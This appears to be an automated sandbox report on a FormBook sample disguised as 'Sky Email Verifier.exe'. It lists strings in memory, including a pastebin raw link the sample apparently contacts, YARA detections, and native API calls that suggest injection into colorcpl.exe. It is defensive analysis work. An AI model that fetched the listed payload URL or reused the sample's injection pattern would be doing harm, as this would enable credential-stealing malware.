          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
          Source: Sky Email Verifier.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: Sky Email Verifier.exeString found in binary or memory: http://ocsp.sectigo.com0
          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com
          Source: Sky Email Verifier.exe, 00000000.00000002.223104574.0000000002731000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.231749304.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Sky Email Verifier.exeString found in binary or memory: https://ghostbin.com/
          Source: colorcpl.exe, 00000007.00000002.470888738.000000000235A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
          Source: colorcpl.exe, 00000007.00000003.331932854.0000000005880000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv
          Source: Sky Email Verifier.exe, 00000000.00000002.223104574.0000000002731000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com
          Source: Sky Email Verifier.exeString found in binary or memory: https://pastebin.com/raw/6FS2vjq5
          Source: Sky Email Verifier.exe, 00000000.00000002.223348090.00000000027D0000.00000004.00000001.sdmp, Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
          Source: Sky Email Verifier.exeString found in binary or memory: https://sectigo.com/CPS0D
          Source: Sky Email Verifier.exe, 00000000.00000002.223298088.00000000027B5000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: Sky Email Verifier.exe, 00000000.00000002.222263719.0000000000998000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.249408964.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.250036862.0000000001710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.470914868.0000000002390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.250085386.0000000001740000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.223476201.0000000003739000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.472311143.0000000004290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.472153635.0000000004260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.Sky Email Verifier.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Sky Email Verifier.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.249408964.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.249408964.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.250036862.0000000001710000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.250036862.0000000001710000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.470914868.0000000002390000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.470914868.0000000002390000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.250085386.0000000001740000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.250085386.0000000001740000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.223476201.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.223476201.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.472311143.0000000004290000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.472311143.0000000004290000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.472153635.0000000004260000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.472153635.0000000004260000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Sky Email Verifier.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Sky Email Verifier.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Sky Email Verifier.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Sky Email Verifier.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_0096C73C NtSetInformationThread,0_2_0096C73C
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_0096D100 NtSetInformationThread,0_2_0096D100
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_00417930 NtCreateFile,2_2_00417930
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_004179E0 NtReadFile,2_2_004179E0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_00417A60 NtClose,2_2_00417A60
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_00417B10 NtAllocateVirtualMemory,2_2_00417B10
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0041792A NtCreateFile,2_2_0041792A
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_00417A5C NtClose,2_2_00417A5C
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_00417B0A NtAllocateVirtualMemory,2_2_00417B0A
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_00417B8A NtAllocateVirtualMemory,2_2_00417B8A
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019799A0 NtCreateSection,LdrInitializeThunk,2_2_019799A0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01979910
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019798F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_019798F0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979840 NtDelayExecution,LdrInitializeThunk,2_2_01979840
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01979860
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01979A00
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979A20 NtResumeThread,LdrInitializeThunk,2_2_01979A20
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979A50 NtCreateFile,LdrInitializeThunk,2_2_01979A50
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019795D0 NtClose,LdrInitializeThunk,2_2_019795D0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979540 NtReadFile,LdrInitializeThunk,2_2_01979540
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979780 NtMapViewOfSection,LdrInitializeThunk,2_2_01979780
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019797A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_019797A0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979FE0 NtCreateMutant,LdrInitializeThunk,2_2_01979FE0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979710 NtQueryInformationToken,LdrInitializeThunk,2_2_01979710
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019796E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_019796E0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01979660
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019799D0 NtCreateProcessEx,2_2_019799D0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979950 NtQueueApcThread,2_2_01979950
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019798A0 NtWriteVirtualMemory,2_2_019798A0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979820 NtEnumerateKey,2_2_01979820
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0197B040 NtSuspendThread,2_2_0197B040
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0197A3B0 NtGetContextThread,2_2_0197A3B0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979B00 NtSetValueKey,2_2_01979B00
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979A80 NtOpenDirectoryObject,2_2_01979A80
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979A10 NtQuerySection,2_2_01979A10
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019795F0 NtQueryInformationFile,2_2_019795F0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0197AD30 NtSetContextThread,2_2_0197AD30
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979520 NtWaitForSingleObject,2_2_01979520
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979560 NtWriteFile,2_2_01979560
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0197A710 NtOpenProcessToken,2_2_0197A710
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979730 NtQueryVirtualMemory,2_2_01979730
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0197A770 NtOpenThread,2_2_0197A770
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979770 NtSetInformationFile,2_2_01979770
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979760 NtOpenProcess,2_2_01979760
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019796D0 NtCreateKey,2_2_019796D0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979610 NtEnumerateValueKey,2_2_01979610
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979650 NtQueryValueKey,2_2_01979650
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01979670 NtQueryInformationProcess,2_2_01979670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9540 NtReadFile,LdrInitializeThunk,7_2_044F9540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F95D0 NtClose,LdrInitializeThunk,7_2_044F95D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9650 NtQueryValueKey,LdrInitializeThunk,7_2_044F9650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_044F9660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9610 NtEnumerateValueKey,LdrInitializeThunk,7_2_044F9610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F96D0 NtCreateKey,LdrInitializeThunk,7_2_044F96D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_044F96E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9710 NtQueryInformationToken,LdrInitializeThunk,7_2_044F9710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9FE0 NtCreateMutant,LdrInitializeThunk,7_2_044F9FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9780 NtMapViewOfSection,LdrInitializeThunk,7_2_044F9780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9840 NtDelayExecution,LdrInitializeThunk,7_2_044F9840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_044F9860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_044F9910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F99A0 NtCreateSection,LdrInitializeThunk,7_2_044F99A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9A50 NtCreateFile,LdrInitializeThunk,7_2_044F9A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9B00 NtSetValueKey,LdrInitializeThunk,7_2_044F9B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9560 NtWriteFile,7_2_044F9560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9520 NtWaitForSingleObject,7_2_044F9520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044FAD30 NtSetContextThread,7_2_044FAD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F95F0 NtQueryInformationFile,7_2_044F95F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9670 NtQueryInformationProcess,7_2_044F9670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9760 NtOpenProcess,7_2_044F9760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044FA770 NtOpenThread,7_2_044FA770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9770 NtSetInformationFile,7_2_044F9770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044FA710 NtOpenProcessToken,7_2_044FA710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9730 NtQueryVirtualMemory,7_2_044F9730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F97A0 NtUnmapViewOfSection,7_2_044F97A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044FB040 NtSuspendThread,7_2_044FB040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9820 NtEnumerateKey,7_2_044F9820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F98F0 NtReadVirtualMemory,7_2_044F98F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F98A0 NtWriteVirtualMemory,7_2_044F98A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9950 NtQueueApcThread,7_2_044F9950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F99D0 NtCreateProcessEx,7_2_044F99D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9A00 NtProtectVirtualMemory,7_2_044F9A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9A10 NtQuerySection,7_2_044F9A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9A20 NtResumeThread,7_2_044F9A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044F9A80 NtOpenDirectoryObject,7_2_044F9A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044FA3B0 NtGetContextThread,7_2_044FA3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7A60 NtClose,7_2_023A7A60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7B10 NtAllocateVirtualMemory,7_2_023A7B10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7930 NtCreateFile,7_2_023A7930
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A79E0 NtReadFile,7_2_023A79E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7A5C NtClose,7_2_023A7A5C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7B0A NtAllocateVirtualMemory,7_2_023A7B0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A7B8A NtAllocateVirtualMemory,7_2_023A7B8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023A792A NtCreateFile,7_2_023A792A
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_0096D2F80_2_0096D2F8
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_009636700_2_00963670
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_0096E8B00_2_0096E8B0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_0096AA500_2_0096AA50
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_00966D500_2_00966D50
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_00960EC00_2_00960EC0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_0096E8A00_2_0096E8A0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_0096AA410_2_0096AA41
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 0_2_00960E8F0_2_00960E8F
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_00408A402_2_00408A40
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_00408A3B2_2_00408A3B
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0041C2C12_2_0041C2C1
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0041ABE32_2_0041ABE3
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0041BD052_2_0041BD05
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0041C50F2_2_0041C50F
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0041C7402_2_0041C740
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0041B7942_2_0041B794
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019599BF2_2_019599BF
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0193F9002_2_0193F900
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019541202_2_01954120
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0194B0902_2_0194B090
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A020A82_2_01A020A8
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019620A02_2_019620A0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A028EC2_2_01A028EC
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A0E8242_2_01A0E824
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019F10022_2_019F1002
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0195A8302_2_0195A830
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0196138B2_2_0196138B
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0196EBB02_2_0196EBB0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019F03DA2_2_019F03DA
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019FDBD22_2_019FDBD2
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0196ABD82_2_0196ABD8
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019E23E32_2_019E23E3
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A02B282_2_01A02B28
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0195A3092_2_0195A309
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019DCB4F2_2_019DCB4F
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0195AB402_2_0195AB40
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A022AE2_2_01A022AE
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019F4AEF2_2_019F4AEF
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0195B2362_2_0195B236
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019EFA2B2_2_019EFA2B
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019625812_2_01962581
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019F2D822_2_019F2D82
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0194D5E02_2_0194D5E0
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A025DD2_2_01A025DD
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A02D072_2_01A02D07
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01930D202_2_01930D20
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A01D552_2_01A01D55
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019F44962_2_019F4496
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0194841F2_2_0194841F
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_0195B4772_2_0195B477
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019FD4662_2_019FD466
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A01FF12_2_01A01FF1
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A0DFCE2_2_01A0DFCE
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01A02EF72_2_01A02EF7
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_019FD6162_2_019FD616
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: 2_2_01956E302_2_01956E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0457D4667_2_0457D466
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044DB4777_2_044DB477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044C841F7_2_044C841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_045744967_2_04574496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04581D557_2_04581D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04582D077_2_04582D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044B0D207_2_044B0D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_045825DD7_2_045825DD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044CD5E07_2_044CD5E0
